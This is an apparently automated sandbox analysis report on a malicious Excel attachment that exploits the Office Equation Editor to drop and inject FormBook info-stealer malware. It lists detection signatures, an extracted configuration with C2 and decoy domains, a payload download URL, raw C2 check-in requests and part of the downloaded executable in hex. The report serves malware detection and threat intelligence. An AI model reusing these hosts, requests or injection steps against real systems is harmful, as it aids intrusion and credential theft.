Windows Analysis Report OCT 13 2021 - PRINT COPY.xlsx

Overview

General Information

Sample Name: OCT 13 2021 - PRINT COPY.xlsx
Analysis ID: 502343
MD5: 5c546d999e38e6e51a6c1675b3a646f3
SHA1: 39ce280bc35b7cc313cbaed2476ee300d7e928c3
SHA256: 980e889b97c92e9a81ff548a481978ad5c2b42829ddb6014d3720c19772e3799
Tags: FormbookVelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Performs DNS queries to domains with low reputation
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000007.00000002.684319508.0000000000190000.00000040.00020000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.fis.photos/ef6c/"], "decoy": ["gicaredocs.com", "govusergroup.com", "conversationspit.com", "brondairy.com", "rjtherealest.com", "xn--9m1bq8wgkag3rjvb.com", "mylori.net", "softandcute.store", "ahljsm.com", "shacksolid.com", "weekendmusecollection.com", "gaminghallarna.net", "pgonline111.online", "44mpt.xyz", "ambrandt.com", "eddytattoo.com", "blendeqes.com", "upinmyfeels.com", "lacucinadesign.com", "docomoau.xyz", "xn--90armbk7e.online", "xzq585858.net", "kidzgovroom.com", "lhznqyl.press", "publicationsplace.com", "jakante.com", "csspadding.com", "test-testjisdnsec.store", "lafabriqueabeilleassurances.com", "clf010.com", "buybabysnuggle.com", "uzmdrmustafaalperaykanat.com", "levanttradegroup.com", "arcflorals.com", "kinglot2499.com", "freekagyans.com", "region10group.gmbh", "yeyelm744.com", "thehomedesigncentre.com", "vngc.xyz", "szesdkj.com", "charlottewright.online", "planetgreennetwork.com", "pacifica7.com", "analogueadapt.com", "sensorypantry.com", "narbaal.com", "restaurant-utopia.xyz", "golnay.com", "szyyglass.com", "redelirevearyseuiop.xyz", "goldsteelconstruction.com", "discovercotswoldcottages.com", "geniuseven.net", "apricitee.com", "stopmoshenik.online", "ya2gh.com", "instatechnovelz.com", "dbe648.com", "seifjuban.com", "conquershirts.store", "totalcovidtravel.com", "pamperotrabajo.com", "satellitphonestore.com"]}
Multi AV Scanner detection for submitted file
Source: OCT 13 2021 - PRINT COPY.xlsx ReversingLabs: Detection: 23%
Yara detected FormBook
Source: Yara match File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.3354b60.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.330a940.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.684319508.0000000000190000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.508839358.0000000007FF5000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.478550746.00000000031E9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.684245712.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.540662107.00000000003D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.500540075.0000000007FF5000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.684466431.00000000005A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.540476989.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://18.197.254.181/www1/deo.exe Avira URL Cloud: Label: malware
Source: www.fis.photos/ef6c/ Avira URL Cloud: Label: malware
Source: http://www.upinmyfeels.com/ef6c/?pVE8Yvg8=qu0EmkGaX3geOx6lIkkYY+FXQg5rkMbAIJtI6DFSABpZ5nF28boqJyWYwUc9r+BjHdgUhg==&OHT=xjWx_NuP96LhBV Avira URL Cloud: Label: malware
Source: http://www.restaurant-utopia.xyz/ef6c/?pVE8Yvg8=QQd8BU9Cv5cEIYl4k4pKDxcRFm34j4nz3hSoRKYyqec7FRTFu3B5N6xNIoSikzbYbjb12w==&OHT=xjWx_NuP96LhBV Avira URL Cloud: Label: phishing
Antivirus or Machine Learning detection for unpacked file
Source: 5.2.vbc.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: cmd.pdb,$ source: vbc.exe, 00000005.00000003.539428502.00000000004AC000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: vbc.exe, cmd.exe
Source: Binary string: cmd.pdb source: vbc.exe, 00000005.00000003.539476945.00000000004EA000.00000004.00000001.sdmp, cmd.exe
Source: Binary string: cmd.pdb,$uJ6$uJ@$uJ source: vbc.exe, 00000005.00000003.539476945.00000000004EA000.00000004.00000001.sdmp, cmd.exe, 00000007.00000000.540165675.000000004A730000.00000040.00020000.sdmp
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_4A732E73 FindFirstFileExW,GetLastError,FindClose,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose, 7_2_4A732E73
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_4A736E47 GetFileAttributesW,FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove, 7_2_4A736E47
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_4A750202 FindFirstFileW,GetFullPathNameW,RemoveDirectoryW,RemoveDirectoryW,GetLastError,GetLastError,GetFileAttributesW,SetFileAttributesW,RemoveDirectoryW,GetLastError, 7_2_4A750202
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_4A74BF0C FindFirstFileW,FindNextFileW,FindClose, 7_2_4A74BF0C
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_4A73BBA4 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,FindNextFileW,GetLastError,FindClose, 7_2_4A73BBA4
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_4A750492 FindFirstFileW,FindFirstFileW,FindClose,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetLastError,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,FindNextFileW,FindClose, 7_2_4A750492

Software Vulnerabilities:

barindex
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: www.ahljsm.com
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\Public\vbc.exe Code function: 4x nop then pop ebx 5_2_00406ABB
Source: C:\Users\Public\vbc.exe Code function: 4x nop then pop edi 5_2_0040C37C
Source: C:\Users\Public\vbc.exe Code function: 4x nop then pop edi 5_2_0040C3E9
Source: C:\Windows\SysWOW64\cmd.exe Code function: 4x nop then pop ebx 7_2_00086ABB
Source: C:\Windows\SysWOW64\cmd.exe Code function: 4x nop then pop edi 7_2_0008C37C
Source: C:\Windows\SysWOW64\cmd.exe Code function: 4x nop then pop edi 7_2_0008C3E9
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 18.197.254.181:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 18.197.254.181:80

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 172.67.213.229:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 172.67.213.229:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 172.67.213.229:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 108.170.14.102 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.dbe648.com
Source: C:\Windows\explorer.exe Domain query: www.lacucinadesign.com
Source: C:\Windows\explorer.exe Network Connect: 45.39.212.162 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.upinmyfeels.com
Source: C:\Windows\explorer.exe Domain query: www.publicationsplace.com
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.ahljsm.com
Performs DNS queries to domains with low reputation
Source: DNS query: www.restaurant-utopia.xyz
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.fis.photos/ef6c/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: SSASN2US SSASN2US
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /ef6c/?OHT=xjWx_NuP96LhBV&pVE8Yvg8=IVc4rtgLgg2h/YWyhQBU9em9uNea1MXNkTy/UnYOuL+WBS8ayE+K1FYcvarTJ+yNk0kAEg== HTTP/1.1Host: www.ahljsm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ef6c/?pVE8Yvg8=69obzrOt3jvlXYYQLOBGpgM4gb/C38tuSyxXcmdwhPVCiSErrrcVtL+HOCZM5DtjL+Sksg==&OHT=xjWx_NuP96LhBV HTTP/1.1Host: www.publicationsplace.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ef6c/?pVE8Yvg8=qu0EmkGaX3geOx6lIkkYY+FXQg5rkMbAIJtI6DFSABpZ5nF28boqJyWYwUc9r+BjHdgUhg==&OHT=xjWx_NuP96LhBV HTTP/1.1Host: www.upinmyfeels.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ef6c/?OHT=xjWx_NuP96LhBV&pVE8Yvg8=9TcXST3pnWOFoH1gaAmWVPk3OXoAybXjykt4lIGhEDNMUFCSIfL5p15n/WQr7vtpGgJ17Q== HTTP/1.1Host: www.lacucinadesign.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ef6c/?pVE8Yvg8=QQd8BU9Cv5cEIYl4k4pKDxcRFm34j4nz3hSoRKYyqec7FRTFu3B5N6xNIoSikzbYbjb12w==&OHT=xjWx_NuP96LhBV HTTP/1.1Host: www.restaurant-utopia.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 13 Oct 2021 18:15:52 GMTServer: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.7Last-Modified: Wed, 13 Oct 2021 09:32:48 GMTETag: "73c00-5ce38a52a9832"Accept-Ranges: bytesContent-Length: 474112Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 19 a5 66 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 aa 05 00 00 90 01 00 00 00 00 00 9e c9 05 00 00 20 00 00 00 e0 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 07 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c c9 05 00 4f 00 00 00 00 e0 05 00 94 8c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 07 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 a9 05 00 00 20 00 00 00 aa 05 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 94 8c 01 00 00 e0 05 00 00 8e 01 00 00 ac 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 07 00 00 02 00 00 00 3a 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 c9 05 00 00 00 00 00 48 00 00 00 02 00 05 00 4c 62 00 00 70 4f 00 00 03 00 00 00 59 00 00 06 bc b1 00 00 90 17 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 56 00 00 00 00 00 00 00 02 1e 7d 01 00 00 04 02 1f 2a 1f 2a 73 15 00 00 0a 7d 02 00 00 04 02 16 7d 03 00 00 04 02 14 7d 04 00 00 04 02 28 16 00 00 0a 00 00 02 28 09 00 00 06 00 02 7b 07 00 00 04 72 01 00 00 70 6f 17 00 00 0a 00 02 7b 09 00 00 04 72 05 00 00 70 6f 17 00 00 0a 00 2a 00 00 1b 30 06 00 fd 01 00 00 01 00 00 11 00 02 03 28 18 00 00 0a 26 02 7b 03 00 00 04 16 fe 01 0d 09 2c 08 14 13 04 38 dc 01 00 00 73 41 00 00 06 25 02 7b 01 00 00 04 02 7c 02 00 00 04 28 19 00 00 0a 5a 02 7b 01 00 00 04 02 7c 02 00 00 04 28 1a 00 00 0a 5a 20 0a 20 26 00 73 1b 00 00 0a 7d 20 00 00 04 25 17 7d 1e 00 00 04 0a 06 7b 20 00 00 04 28 1c 00 00 0a 13 05 00 11 05 28 1d 00 00 0a 6f 1e 00 00 0a 00 16 13 06 2b 63 16 13 07 2b 43 00 11 07 11 06 58 18 5d 16 fe 01 13 08 11 08 2c 2b 11 05 28 1f 00 00 0a 11 07 02 7b 01 00 00 04 5a 11 06 02 7b 01 00 00 04 5a 02 7b 01 00 00 04 02 7b 01 00
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /www1/deo.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 18.197.254.181Connection: Keep-Alive
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Oct 2021 18:17:12 GMTServer: Apache/2.2.15 (CentOS)Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 65 66 36 63 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ef6c/ was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 13 Oct 2021 18:17:25 GMTContent-Type: text/htmlContent-Length: 275ETag: "61672139-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 13 Oct 2021 18:17:30 GMTContent-Type: text/htmlContent-Length: 275ETag: "61672139-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: unknown TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: explorer.exe, 00000006.00000000.495770768.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: explorer.exe, 00000006.00000000.529921380.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000006.00000000.495770768.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000006.00000000.495770768.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000006.00000000.494338414.0000000000255000.00000004.00000020.sdmp String found in binary or memory: http://java.sun.com
Source: explorer.exe, 00000006.00000000.484239269.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000006.00000000.484239269.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 00000006.00000000.494645259.0000000001BE0000.00000002.00020000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000006.00000000.505593565.0000000003E50000.00000002.00020000.sdmp, cmd.exe, 00000007.00000002.684965488.0000000001D50000.00000002.00020000.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000006.00000000.484239269.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000006.00000000.529921380.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000006.00000000.529921380.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000006.00000000.484239269.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000006.00000000.494645259.0000000001BE0000.00000002.00020000.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000006.00000000.494338414.0000000000255000.00000004.00000020.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3
Source: vbc.exe, 00000004.00000002.478433706.00000000021E1000.00000004.00000001.sdmp String found in binary or memory: http://www.collada.org/2005/11/COLLADASchema9Done
Source: explorer.exe, 00000006.00000000.529921380.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000006.00000000.495770768.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000006.00000000.484239269.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000006.00000000.529921380.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000006.00000000.495770768.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
